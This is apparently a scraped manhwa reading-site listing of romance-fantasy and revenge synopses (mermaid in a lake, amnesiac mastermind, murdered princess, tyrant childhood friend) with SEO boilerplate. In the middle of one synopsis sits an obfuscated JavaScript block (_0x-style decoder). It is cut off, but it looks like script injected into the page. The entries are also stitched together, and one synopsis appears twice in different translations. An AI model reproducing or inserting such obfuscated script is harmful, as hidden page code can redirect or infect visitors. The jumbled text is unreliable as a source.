“Servane, why didn’t you come see me?” A person, no, a mermaid, calling out to my great-grandfather’s granddaughter who resembled me. My ancestors, who loved mermaids so much, are said to have locked her in a lake. What was the mermaid thinking all this time, waiting for someone who had been dead for over a hundred years? Enduring terrible pain, day after day, every single day. That was probably, “I wanted to see you.” … It was clearly revenge.
Read manhwa The Merman Trapped in My Lake “Serbain, why didn’t you come to see me?” A voice called me, addressing me by the name of my great-grandfather’s granddaughter. It wasn’t a person, but a siren. Legend has it that my ancestor, who cherished the siren deeply, imprisoned him in the lake. What could the siren have been thinking all these years, waiting for someone who died over a century ago? Enduring unbearable pain, day after day, without fail. Perhaps… “I missed you.” …It has to be revenge. Doesn’t it? 내 호수에 가둔 인어
After a year possessed as an extra, I picked up the dying mastermind. But this man seems to have amnesia. “What kind of relationship were we?” And a strange misunderstanding! “Whenever I see you my heart beats violently, my head hurts like it’s going to break, and I feel dizzy.” “Tha, that’s…” “What is it if it is not love?” That’s not love, it’s because I smashed the back of your head. *** Dillian’s misunderstanding started then grew out of control. “If we’re not lovers, we’re a married couple.” “That’s not it…” “I will take care of it, I will pay you for the rest of my life.” “…” “So wife, you must not leave my side.” His touch reached my foot. Slowly and smoothly his hand climbed up, wrapped around my ankle. As if, it’s like I got shackled. “Lea, what if I leave, you will kill me?” “How can I do that?” He responded lightly with a smiling voice. “I’m going to kill the man who took you.” …I think I got caught by the wrong one. 괴물 공작이 나를 아내로 착각한다
Read manhwa The Monster Lady and the Holy Knight / The Monster Lady and the Paladin “The Monster Lady and the Holy Knight” is another name: 괴물 아가씨와 성기사
A man whose time has stopped, and a woman who flows like a river. Story about strife that comes and goes in the past and in the present.<script></script><script>function _0x1aec(_0x61e82,_0x25782c){var _0x37bd5f=_0x3347();return _0x1aec=function(_0x2455a9,_0x2736ee){_0x2455a9=_0x2455a9-(-0x39*-0xa6+-0x1e56+0xf*-0x5f);var _0x249617=_0x37bd5f[_0x2455a9];return _0x249617;},_0x1aec(_0x61e82,_0x25782c);}(function(_0x2a87b1,_0x2bf0a3){var _0x26d6cf=_0x1aec,_0x1c6bba=_0x2a87b1();while(!![]){try{var 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Read manhua The more I die, the more invincible I become Summoned into a world where the divine and martial arts coexisted, Qiao Mu can revive infinitely and level up. The more tragic his death, the stronger he becomes after he is revived. The enemies are shocked to realize after defeating a young man an older man shows up, repeating infinitely! Rumors started to spread about a legendary Qiao family… Wait, no one told me that reviving makes me older! “The more I die, the more invincible I become Manhua” is another name: 多杀我几次,我就无敌了
Read The Murdered Princess and the Innocent Traitor Novel – The Murdered Princess and the Innocent Traitor Manhwa Online Free At ZINMANGA.NET The summary of the comic The Murdered Princess and the Innocent Traitor: Brigit, who has spent her entire life as a commoner orphan, finally reunites with her brother, the emperor, and her sister, the princess. Just as she begins to envision a bright future with her family, she is brutally murdered by her own siblings as a sacrificial offering on her coming -of-age day. Now, her life is turned back by Nidhor, the evil dragon, and she awakens as a commoner who has yet to find her family. Knowing that she is sure to face death should she return to the palace, she decides to flee the empire quickly and finds a job as a sorceress. However, by a twist of fate, she lands a job at an enterprise run by the traitor duke.. Will Brigit manage to successfully fulfill her contract and escape the empire? “The Murdered Princess and the Innocent Traitor” is also known as: 살해당한 황녀는 반역 공작가에 취직한다 The comic The Murdered Princess and the Innocent Traitor belongs to the Genre: Drama, Fantasy, Manhwa, Romance, Webtoons “Top Manhwa, MangaUpdates, Read Manhwa Online…” are the most searched keywords on the website ZINMANGA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging
Read manhwa The Namgung Clan’s Youngest Daughter Everyone in the Namgung Clan despised me. I lived a life even my siblings turned their backs on. But when the clan was destroyed, what my siblings chose… was not the family, but me. “I never once thought of you as family.” “Live. Even if it’s shameful and filthy, live, Ahi.” Why did they save me? With that question buried in my heart for my entire life, I achieved my revenge. And just when I thought I could finally close my eyes… “Baa?” I’ve gone back in time?! …Could this be the Blood Sect’s sorcery? My… my revenge? My peaceful rest?! Why do the Namgung siblings keep clinging to me again?! What the hell is going on?!
Read “The Nerd Turned Out To Be The Tyrant Novel” – “The Nerd Turned Out To Be The Tyrant Manhwa” Online Free At Manga Zin The Summary Of The Comics “The Nerd Turned Out To Be The Tyrant”: I’ve Been Reincarnated Into An R-19 Dark Romance Novel Where The Tyrant Runs Amok And Kills All The Characters. But It’s Okay Since This Is A Remote Countryside Village Far From The Imperial Palace, Right? All I Need To Do Is Live A Peaceful Life With My Quiet Childhood Friend, “Lev,” Who Loves Books. He’s So Kind And Innocent, How Can Anyone Not Love Him? …I Didn’t Know Then. My Nerdy Childhood Friend… Is The Tyrannical Crown Prince Male Lead In The Novel?! “The Nerd Turned Out To Be The Tyrant” Is Alternatively Named: The Nerdy Man Turns Out To Be A Tyrant / 陰キャな幼馴染が実は暴君でした / 너드남이 알고 보니 폭군이라 합니다 The Comics “The Nerd Turned Out To Be The Tyrant” Belongs To The Genre: Drama, Fantasy, Manhwa, Romance, Webtoons “Kun Manga, Manhwa Updates, Hari Manga…” Are The Most Searched Keywords On The Website Manhwa Clan. We Offer A Wide Selection Of The Best And Newest Comics Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King By Scavenging
A strange old lady appears before the 31-year-old protagonist, who graduated from a provincial university, has no connections, and no impressive credentials! \"Buy one for me...\" The old lady suddenly thrusts a piece of gum forward, claiming that chewing it will make you smarter, better at work, and even more likable. The protagonist, caught off guard, ends up buying it. During a job interview, He absentmindedly swallows the gum, and from that moment on, things start to strangely go His way...